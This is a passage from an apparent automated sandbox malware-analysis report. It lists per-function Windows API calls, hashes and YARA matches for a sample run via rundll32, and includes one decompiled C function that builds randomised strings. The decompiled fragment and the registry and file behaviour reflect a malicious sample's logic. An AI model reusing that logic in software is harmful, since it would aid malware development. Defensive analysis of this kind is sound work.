                                          • GetCurrentThreadId.KERNEL32 ref: 00B6B3B6
                                          • GetCurrentThread.KERNEL32 ref: 00B6B3C7
                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,Function_0000121A,?,00000001), ref: 00B6B404
                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,Function_0000121A,?,00000001), ref: 00B6B418
                                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 00B6B426
                                          • wsprintfA.USER32 ref: 00B6B43E
                                            • Part of subcall function 00B65B7E: lstrlen.KERNEL32(00000000,00000000,00000000,00000008,00B64325,00000000,00000000,00000000,00000000,00000000,?,00B5479A,00000000,00000000,00000000,00000000), ref: 00B65B88
                                            • Part of subcall function 00B65B7E: lstrcpy.KERNEL32(00000000,00000000), ref: 00B65BAC
                                            • Part of subcall function 00B65B7E: StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,00B5479A,00000000,00000000,00000000,00000000), ref: 00B65BB3
                                            • Part of subcall function 00B65B7E: lstrcat.KERNEL32(00000000,?), ref: 00B65C0A
                                          • lstrlen.KERNEL32(00000000,00000000), ref: 00B6B449
                                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 00B6B460
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B6B471
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B6B47D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
                                          • String ID:
                                          • API String ID: 773763258-0
                                          • Opcode ID: b9bd528eba08ade43de67d3225b9525dfe5a43ffd80d4a52937fee8d9084117c
                                          • Instruction ID: 1b9dd558acd3c0ffe5c892f08ff1951e8ea286dac9e5aa31f5cc8decfabf832b
                                          • Opcode Fuzzy Hash: b9bd528eba08ade43de67d3225b9525dfe5a43ffd80d4a52937fee8d9084117c
                                          • Instruction Fuzzy Hash: FF71E271900119EFCB11DFA5DC89EAEBBF9FF08310F1480A5E609E7220DB35A995DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B67785 Relevance: 18.1, APIs: 12, Instructions: 136stringmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(00000000,76D85520,?,00000000,?,?,?), ref: 00B6779B
                                          • lstrlen.KERNEL32(?), ref: 00B677A3
                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00B677B3
                                          • lstrcpy.KERNEL32(00000000,?), ref: 00B677D2
                                          • lstrlen.KERNEL32(?), ref: 00B677E7
                                          • lstrlen.KERNEL32(?), ref: 00B677F5
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 00B67843
                                          • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 00B67867
                                          • lstrlen.KERNEL32(?), ref: 00B6789A
                                          • HeapFree.KERNEL32(00000000,?,?), ref: 00B678C5
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 00B678DC
                                          • HeapFree.KERNEL32(00000000,?,?), ref: 00B678E9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$Heap$Free$Allocatelstrcpy
                                          • String ID:
                                          • API String ID: 904523553-0
                                          • Opcode ID: 00b18a22cb8e28c8b38ebd19310fe0d2c3f6629f6025254b9320986c7bfed969
                                          • Instruction ID: ffc62a38c5208516a1b7bb0eb06c15e3ad269bb49ee859059c34428dc3389ccc
                                          • Opcode Fuzzy Hash: 00b18a22cb8e28c8b38ebd19310fe0d2c3f6629f6025254b9320986c7bfed969
                                          • Instruction Fuzzy Hash: 9A417C7290020AEFDF119F65CC88AAE7BB9FF44314F1044A5F90997260DF34AD51DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B62036 Relevance: 18.1, APIs: 12, Instructions: 95registrymemorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlImageNtHeader.NTDLL(?), ref: 00B62047
                                          • GetTempPathA.KERNEL32(00000000,00000000,?,?,00B70300,00000094,00000000,00000000,?), ref: 00B6205F
                                          • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 00B6206E
                                          • GetTempPathA.KERNEL32(00000001,00000000,?,?,00B70300,00000094,00000000,00000000,?), ref: 00B62081
                                          • GetTickCount.KERNEL32 ref: 00B62085
                                          • wsprintfA.USER32 ref: 00B6209C
                                          • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 00B620D7
                                          • StrRChrA.SHLWAPI(00000000,00000000,?), ref: 00B620F7
                                          • lstrlen.KERNEL32(00000000), ref: 00B62101
                                          • RegSetValueExA.ADVAPI32(00000001,00000001,00000000,00000001,00000000,00000001), ref: 00B62111
                                          • RegCloseKey.ADVAPI32(?), ref: 00B6211D
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000001,00000000,?), ref: 00B6212B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTickValuelstrlenwsprintf
                                          • String ID:
                                          • API String ID: 3778301466-0
                                          • Opcode ID: ed8ec048a6d7fb22dfb29e5461519d8a95ad91103ce84de451af0d60b733eba8
                                          • Instruction ID: f3abc0ada8c3ada660d21d6e049ec684555713661d5779bca412dd8bf8bc666a
                                          • Opcode Fuzzy Hash: ed8ec048a6d7fb22dfb29e5461519d8a95ad91103ce84de451af0d60b733eba8
                                          • Instruction Fuzzy Hash: 54314971405119FFEB119FA0EC8CDAB3BADEF46355B004065FA0AE7220DB358E91DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B615AA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120memorythreadstringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlImageNtHeader.NTDLL(00000000), ref: 00B615D4
                                          • GetCurrentThreadId.KERNEL32 ref: 00B615EA
                                          • GetCurrentThread.KERNEL32 ref: 00B615FB
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666CE
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666E7
                                            • Part of subcall function 00B666BC: GetCurrentThreadId.KERNEL32 ref: 00B666F4
                                            • Part of subcall function 00B666BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B66700
                                            • Part of subcall function 00B666BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B6670E
                                            • Part of subcall function 00B666BC: lstrcpy.KERNEL32(00000000), ref: 00B66730
                                            • Part of subcall function 00B64309: lstrlen.KERNEL32(00000000,00000001,00000000,?,?,00000001,00000000,00000000,00000000,00000000,?,00B5479A,00000000,00000000,00000000,00000000), ref: 00B64374
                                            • Part of subcall function 00B64309: HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000001,00000000,00000000,00000000,00000000,?,00B5479A,00000000,00000000,00000000,00000000), ref: 00B6439C
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 00B61675
                                          • HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 00B61681
                                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 00B616D0
                                          • wsprintfA.USER32 ref: 00B616E8
                                          • lstrlen.KERNEL32(00000000,00000000), ref: 00B616F3
                                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 00B6170A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
                                          • String ID: W
                                          • API String ID: 630447368-655174618
                                          • Opcode ID: 3cbdd44da066b4824926af868c2dc42868f4e461a64b8b4387c13339c23a857e
                                          • Instruction ID: 393b5c231ab255fbb142e284c7dd404995605a655ce7fea8c7feec034c9f6bfd
                                          • Opcode Fuzzy Hash: 3cbdd44da066b4824926af868c2dc42868f4e461a64b8b4387c13339c23a857e
                                          • Instruction Fuzzy Hash: 5F414675900119FFDF11DFA5DC88DAE7BF9EF09740B0844A5F909A3260DB398A90DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B53F20 Relevance: 16.7, APIs: 11, Instructions: 157registrystringfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00B53F4B
                                            • Part of subcall function 00B5B0A5: RegCloseKey.ADVAPI32(?), ref: 00B5B12C
                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00B53F86
                                          • lstrcpyW.KERNEL32(-00000002,?), ref: 00B53FE8
                                          • lstrcatW.KERNEL32(00000000,?), ref: 00B53FFD
                                          • lstrcpyW.KERNEL32(?), ref: 00B54017
                                          • lstrcatW.KERNEL32(00000000,?), ref: 00B54026
                                            • Part of subcall function 00B5E793: lstrlenW.KERNEL32(?,00000000,?,00B54045,00000000,?), ref: 00B5E7A6
                                            • Part of subcall function 00B5E793: lstrlen.KERNEL32(?,?,00B54045,00000000,?), ref: 00B5E7B1
                                            • Part of subcall function 00B5E793: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 00B5E7C6
                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,?), ref: 00B54090
                                            • Part of subcall function 00B65F3B: lstrlenW.KERNEL32(?,74DB06E0,00B72F1B,80000001,?,?,00B5C229,?,?,00B540AD,00000000,?,00000000,?), ref: 00B65F47
                                            • Part of subcall function 00B65F3B: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,00B5C229,?,?,00B540AD,00000000,?,00000000,?), ref: 00B65F6F
                                            • Part of subcall function 00B65F3B: memset.NTDLL ref: 00B65F81
                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,00000000,?), ref: 00B540C5
                                          • GetLastError.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?), ref: 00B540D0
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B540E6
                                          • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?), ref: 00B540F8
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
                                          • String ID:
                                          • API String ID: 1430934453-0
                                          • Opcode ID: a6a516a3977bd6b39c63965a7cffd75314702438c6813a4bdd4be280788aad24
                                          • Instruction ID: bc4cc236193cd329678e3ecb2c7f2d28064752a187652b01e7ae5b404162aef7
                                          • Opcode Fuzzy Hash: a6a516a3977bd6b39c63965a7cffd75314702438c6813a4bdd4be280788aad24
                                          • Instruction Fuzzy Hash: 3D517D71500109FFDB119BA4DC84EAA7BFDEF08305F2505A5FA09E32A0DB359A95DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 048926E7 Relevance: 16.6, APIs: 11, Instructions: 145stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 55%
                                          			E048926E7(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				WCHAR* _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				WCHAR* _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				WCHAR* _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				WCHAR* _t125;

				_t58 =  *0x489a3dc; // 0x5249c48
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E048959CA();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E048959CA();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E04894B8D(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E04894B8D(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E04894480(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x489918c;
						}
						_t70 = E048922D6(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E04894DF6(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x489a348; // 0x9ad5a8
								_t28 = _t105 + 0x489bb08; // 0x530025
								wsprintfW(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E04894480(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x4899190;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E04894DF6(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E04894C73(_v24);
								} else {
									_t92 =  *0x489a348; // 0x9ad5a8
									_t44 = _t92 + 0x489bc80; // 0x73006d
									wsprintfW(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E04894C73(_v8);
						}
						E04894C73(_v12);
					}
					E04894C73(_v16);
				}
				return _v28;
			}


































                                          0x048926ed
                                          0x048926f5
                                          0x048926f8
                                          0x04892705
                                          0x04892708
                                          0x0489270f
                                          0x04892716
                                          0x04892719
                                          0x04892726
                                          0x04892729
                                          0x0489272c
                                          0x04892731
                                          0x04892736
                                          0x0489273e
                                          0x04892743
                                          0x04892748
                                          0x0489274e
                                          0x04892752
                                          0x0489275b
                                          0x0489275f
                                          0x04892761
                                          0x04892761
                                          0x04892769
                                          0x0489276e
                                          0x04892773
                                          0x04892779
                                          0x04892780
                                          0x04892791
                                          0x04892798
                                          0x048927aa
                                          0x048927af
                                          0x048927b4
                                          0x048927bd
                                          0x048927cf
                                          0x048927e5
                                          0x048927ea
                                          0x048927ee
                                          0x048927f2
                                          0x048927f7
                                          0x048927fc
                                          0x048927fe
                                          0x048927fe
                                          0x04892808
                                          0x04892811
                                          0x04892818
                                          0x04892834
                                          0x04892838
                                          0x04892871
                                          0x0489283a
                                          0x0489283d
                                          0x04892845
                                          0x04892856
                                          0x0489285e
                                          0x04892866
                                          0x0489286a
                                          0x0489286a
                                          0x04892838
                                          0x04892879
                                          0x04892879
                                          0x04892881
                                          0x04892881
                                          0x04892889
                                          0x04892889
                                          0x04892895

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 048926FF
                                          • lstrlen.KERNEL32(00000000,00000005), ref: 04892780
                                          • lstrlen.KERNEL32(?), ref: 04892791
                                          • lstrlen.KERNEL32(00000000), ref: 04892798
                                          • lstrlenW.KERNEL32(80000002), ref: 0489279F
                                          • wsprintfW.USER32 ref: 048927E5
                                          • lstrlen.KERNEL32(?,00000004), ref: 04892808
                                          • lstrlen.KERNEL32(?), ref: 04892811
                                          • lstrlen.KERNEL32(?), ref: 04892818
                                          • lstrlenW.KERNEL32(?), ref: 0489281F
                                          • wsprintfW.USER32 ref: 04892856
                                            • Part of subcall function 04894C73: RtlFreeHeap.NTDLL(00000000,00000000,048955C4,00000000,?,?,00000000), ref: 04894C7F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$wsprintf$CountFreeHeapTick
                                          • String ID:
                                          • API String ID: 822878831-0
                                          • Opcode ID: fecbbcff8ff52af4212fad598d5809838deac772b05bd7a5c72131bb073c3353
                                          • Instruction ID: 51ee936d0edbfad4c0e520e8496b4acdd1c50314654cf628f78d5d1f116da712
                                          • Opcode Fuzzy Hash: fecbbcff8ff52af4212fad598d5809838deac772b05bd7a5c72131bb073c3353
                                          • Instruction Fuzzy Hash: 7E51BB72D00A19BBDF12AFA8DC04ADE7BB5EF04318F094A64E904E7210DB75EE11DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B59ECE Relevance: 16.6, APIs: 11, Instructions: 144memoryregistryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 00B59F04
                                          • RtlAllocateHeap.NTDLL(00000000,00000104), ref: 00B59F19
                                          • RegCreateKeyA.ADVAPI32(80000001,?), ref: 00B59F41
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B59F82
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B59F92
                                          • RtlAllocateHeap.NTDLL(00000000,00B6782C), ref: 00B59FA5
                                          • RtlAllocateHeap.NTDLL(00000000,00B6782C), ref: 00B59FB4
                                          • HeapFree.KERNEL32(00000000,00000000,?,00B6782C,00000000,?,?,?), ref: 00B59FFE
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00B6782C,00000000,?,?,?,?), ref: 00B5A022
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00B6782C,00000000,?,?,?), ref: 00B5A047
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00B6782C,00000000,?,?,?), ref: 00B5A05C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$Allocate$CloseCreate
                                          • String ID:
                                          • API String ID: 4126010716-0
                                          • Opcode ID: 168de0ae04b3fda3753ed381b15a37884347ba08bd811ffe69b24f552265ff79
                                          • Instruction ID: 1ddc5d175126aa4b01bec5e4c59fa2508eae214ae1124955c0518dd0847d810f
                                          • Opcode Fuzzy Hash: 168de0ae04b3fda3753ed381b15a37884347ba08bd811ffe69b24f552265ff79
                                          • Instruction Fuzzy Hash: 8E51B375810209EFDF119FA4DC849EEBBB9FB08355F1444AAEA09B2220D7315E98DF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B669E1 Relevance: 16.6, APIs: 11, Instructions: 121memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PathFindFileNameW.SHLWAPI(?), ref: 00B669FB
                                          • PathFindFileNameW.SHLWAPI(?), ref: 00B66A11
                                          • lstrlenW.KERNEL32(00000000), ref: 00B66A54
                                          • RtlAllocateHeap.NTDLL(00000000,00B72F1D), ref: 00B66A6A
                                          • memcpy.NTDLL(00000000,00000000,00B72F1B), ref: 00B66A7D
                                          • _wcsupr.NTDLL ref: 00B66A89
                                          • lstrlenW.KERNEL32(?,00B72F1B), ref: 00B66AC2
                                          • RtlAllocateHeap.NTDLL(00000000,?,00B72F1B), ref: 00B66AD7
                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00B66AED
                                          • lstrcatW.KERNEL32(00000000,?), ref: 00B66B13
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B66B22
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
                                          • String ID:
                                          • API String ID: 3868788785-0
                                          • Opcode ID: c117477033045475995f75dac9dfe2d8426121b59cb2a647c01e8ecdfd883422
                                          • Instruction ID: 2ce7bb5abcb6f55cdbbce1698663d9177b848e781d3035ecb77bc75133846b5b
                                          • Opcode Fuzzy Hash: c117477033045475995f75dac9dfe2d8426121b59cb2a647c01e8ecdfd883422
                                          • Instruction Fuzzy Hash: 5C313B32500204AFC720AFB4EC88E6F7BE9EF49311B19455DF619E3161DF349C858B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B62E58 Relevance: 16.6, APIs: 11, Instructions: 102registrymemorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00B62E7C
                                            • Part of subcall function 00B5B0A5: RegCloseKey.ADVAPI32(?), ref: 00B5B12C
                                          • lstrcmpiW.KERNEL32(?,?,?,?,00000000), ref: 00B62EAB
                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00B62EBC
                                          • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 00B62EF6
                                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000004,00000004), ref: 00B62F18
                                          • RegCloseKey.ADVAPI32(?), ref: 00B62F21
                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 00B62F37
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B62F4C
                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 00B62F60
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B62F75
                                          • RegCloseKey.ADVAPI32(?), ref: 00B62F7E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenValuelstrcmpilstrlen
                                          • String ID:
                                          • API String ID: 534682438-0
                                          • Opcode ID: 1b3ad48017f8fafd9a0c4a4cd790dbc82ab88d8a309251df35223ac2c18c22f8
                                          • Instruction ID: 120fd5ceec5719cc5e10fddc957bc69a4ce924b70b7f3d0ff15bdfd1fb1ace31
                                          • Opcode Fuzzy Hash: 1b3ad48017f8fafd9a0c4a4cd790dbc82ab88d8a309251df35223ac2c18c22f8
                                          • Instruction Fuzzy Hash: 91315976900509FFEB119FA4EC88DAE7BF9FB48301B1444A5F609E3120DB369E94DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6026E Relevance: 16.6, APIs: 11, Instructions: 80memoryfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 00B60285
                                          • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,00B7049C,00000094,00000000,00000001,00000094,00000000,00000000,?,00B5B047,00000000,00000094), ref: 00B60297
                                          • StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,00B7049C,00000094,00000000,00000001,00000094,00000000,00000000,?,00B5B047,00000000,00000094), ref: 00B602A4
                                          • wsprintfA.USER32 ref: 00B602BF
                                          • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,?,00B5B047,00000000,00000094,00000000), ref: 00B602D5
                                          • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 00B602EE
                                          • WriteFile.KERNEL32(00000000,00000000), ref: 00B602F6
                                          • GetLastError.KERNEL32 ref: 00B60304
                                          • CloseHandle.KERNEL32(00000000), ref: 00B6030D
                                          • GetLastError.KERNEL32(?,00000000,?,00B7049C,00000094,00000000,00000001,00000094,00000000,00000000,?,00B5B047,00000000,00000094,00000000), ref: 00B6031E
                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00B7049C,00000094,00000000,00000001,00000094,00000000,00000000,?,00B5B047,00000000,00000094), ref: 00B6032E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
                                          • String ID:
                                          • API String ID: 3873609385-0
                                          • Opcode ID: 12855612cd8919f8e9f222db28875ab04461c16f8bbc9c4f69091f09add8115d
                                          • Instruction ID: 492f39f25361716a5dddd74f85c4298a2e70e5c1ab4a28a01ebd272e25b85aef
                                          • Opcode Fuzzy Hash: 12855612cd8919f8e9f222db28875ab04461c16f8bbc9c4f69091f09add8115d
                                          • Instruction Fuzzy Hash: 5611B472141218BFE2216B65AC8CFBB3B9CEB4A767F010065FA0BD3290DF250D85C675
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B51A49 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • StrChrA.SHLWAPI(?,0000002C), ref: 00B51A7A
                                          • StrChrA.SHLWAPI(00000001,0000002C), ref: 00B51A8D
                                          • StrTrimA.SHLWAPI(?,?), ref: 00B51AB0
                                          • StrTrimA.SHLWAPI(00000001,?), ref: 00B51ABF
                                          • lstrlen.KERNEL32(?), ref: 00B51AF4
                                          • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 00B51B07
                                          • lstrcpy.KERNEL32(00000004,?), ref: 00B51B25
                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,-00000005,00000001), ref: 00B51B49
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HeapTrim$AllocateFreelstrcpylstrlen
                                          • String ID: W
                                          • API String ID: 1974185407-655174618
                                          • Opcode ID: cdefdf1e0b43efddfc76c0e89d36d8c20f289d1accf6c9b090b4834c686805a9
                                          • Instruction ID: db15f98dd6df0ce49cbf0164e41f396d0a72bc967793644b141fd649be1cf7b8
                                          • Opcode Fuzzy Hash: cdefdf1e0b43efddfc76c0e89d36d8c20f289d1accf6c9b090b4834c686805a9
                                          • Instruction Fuzzy Hash: 2A317E35900219FFDB119FA8DC48F9A7BF8EF09711F1444DAF909A7250EB709D848BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6BC40 Relevance: 15.3, APIs: 10, Instructions: 279memorythreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 00B6BCB7
                                          • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 00B6BCD6
                                            • Part of subcall function 00B63672: wsprintfA.USER32 ref: 00B63685
                                            • Part of subcall function 00B63672: CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 00B63697
                                            • Part of subcall function 00B63672: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 00B636C1
